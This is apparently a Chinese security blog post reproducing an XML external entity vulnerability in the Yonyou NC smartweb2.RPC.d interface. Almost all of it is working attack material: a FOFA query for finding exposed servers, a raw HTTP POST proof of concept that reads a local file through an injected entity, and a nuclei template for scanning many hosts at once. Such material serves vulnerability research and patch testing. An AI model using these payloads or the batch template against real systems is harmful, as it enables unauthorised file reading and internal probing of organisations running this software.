用友NC smartweb2.RPC.d XML外部实体注入漏洞

漏洞简介

用友NC系统的smartweb2.RPC.d接口存在XML外部实体注入漏洞,攻击者可以利用该漏洞进行文件读取、内网端口扫描等攻击。

漏洞复现

fofa语法:app="用友-UFIDA-NC"
登录页面如下:

POC:

POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 258
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

nuclei批量yaml文件

id: yonyou_NC_XML
info:
  name: NC系统的XML实体注入漏洞
  author: mhb17
  severity: high
  description: description
  reference:
    - 
  tags: fileread
requests:
  - raw:
      - |+
        POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
        Connection: close
        Accept-Encoding: gzip, deflate
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
        Content-Type: application/x-www-form-urlencoded
        Host: {{Hostname}}
        Accept-Language: zh-CN,zh;q=0.9
        Content-Length: 442

        __viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - for 16-bit app support
      - type: word
        part: header
        words:
          - '200'
posted @   学安全的小白  阅读(718)  评论(0编辑  收藏  举报
相关博文:
· 用友NC_download文件读取漏洞
· 用友NC uapws接口老版本存在数据库账号密码泄露
· 用友U8 Cloud smartweb2.RPC.d 存在XXE漏洞
· 【漏洞复现】用友NC-Cloud PMCloudDriveProjectStateServlet接口存在JNDI注入漏洞
· 【漏洞复现】用友NC uapjs RCE漏洞(CNVD-C-2023-76801)
阅读排行:
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么 退出登录 或 修改密码 无法使 token 失效
历史上的今天:
2021-10-19 buu刷题笔记之文件上传
点击右上角即可分享
微信分享提示